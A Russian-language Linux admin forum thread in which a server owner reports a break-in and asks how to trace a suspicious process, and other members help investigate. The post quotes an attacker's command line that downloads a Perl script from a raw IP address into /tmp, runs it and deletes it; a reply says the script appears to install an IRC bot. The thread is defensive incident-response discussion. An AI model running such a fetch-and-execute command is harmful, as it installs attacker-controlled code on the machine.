LINUX.ORG.RU
ФорумAdmin

Атака


0

0

Всем привет!

Помогите разобраться. Кто-то вломился в систему.
Как выяснить, кто пытается запустить данный процесс? 
19715 www sh -c cd /tmp;wget http://84.244.2.24/mambus.txt;perl mambus.txt;rm -rf mambus.txt

Всем спасибо за помощь.
Владимир
anonymous

Ответ на: Re: Атака от Lumi

Re: Атака

PS: ничего не скажет, если уже отключились. Лучше скачать http://84.244.2.24/mambus.txt и посмотреть чего же именно наколбасили в системе.

Lumi ★★★★★ ()
Ответ на: Re: Атака от Lumi

Re: Атака

netstat -t не помогает

anonymous ()
Ответ на: Re: Атака от phoenix

Re: Атака

трудно проследить, потому как вызовешь эту команду, как оно уже отключается

anonymous ()
Ответ на: Re: Атака от anonymous

Re: Атака

Вроде должен встать irc-bot на порт 65321, но чего-то они там не осиливают. И ^M там полно ;)

Lumi ★★★★★ ()
Ответ на: Re: Атака от Lumi

Re: Атака

спасибо, проверю :-)
если у кого еще будут мысли, то добро пожаловать

anonymous ()
Ответ на: Re: Атака от Lumi

Re: Атака

оно не может записать это филе мне в /tmp, поэтому нельзы выполнить ни less ни perl :-).

anonymous ()
Ответ на: Re: Атака от anonymous

Re: Атака

Лучше ищи почему и как тебя поимели. В следующий раз подправят скриптик и будет им счастье. А так -- детишки какие-то побаловались безобидно.

Lumi ★★★★★ ()
Ответ на: Re: Атака от anonymous

Re: Атака

Может grep`нуть логи web-сервера на предмет 'mambus'?

kmeaw ★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.